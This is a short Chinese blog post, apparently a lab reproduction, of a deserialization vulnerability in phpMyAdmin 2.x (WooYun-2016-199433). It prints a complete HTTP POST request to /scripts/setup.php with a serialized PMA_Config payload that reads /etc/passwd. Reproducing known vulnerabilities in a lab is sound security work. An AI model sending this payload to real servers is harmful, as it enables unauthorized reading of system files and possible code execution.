Phpmyadmin 2.X 反序列化漏洞（WooYun-2016-199433）

漏洞简介

phpmyadmin 2.x版本中存在一处反序列化漏洞，通过该漏洞，攻击者可以读取任意文件或执行任意代码。

漏洞影响版本

phpmyadmin 2.x

漏洞复现

访问漏洞存在页面上burp抓包构造URL

 1 POST /scripts/setup.php HTTP/1.1
 2 Host: your-ip:8080
 3 Accept-Encoding: gzip, deflate
 4 Accept: */*
 5 Accept-Language: en
 6 User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
 7 Connection: close
 8 Content-Type: application/x-www-form-urlencoded
 9 Content-Length: 80
10 
11 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

更改请求为post并添加如下payload后发送，即可读取/etc/passwd

posted @ 2021-05-23 14:48 whited 阅读(124) 评论(0) 编辑收藏举报

会员救园

刷新页面返回顶部

Phpmyadmin 2.X 反序列化漏洞（WooYun-2016-199433）

漏洞简介

漏洞影响版本

公告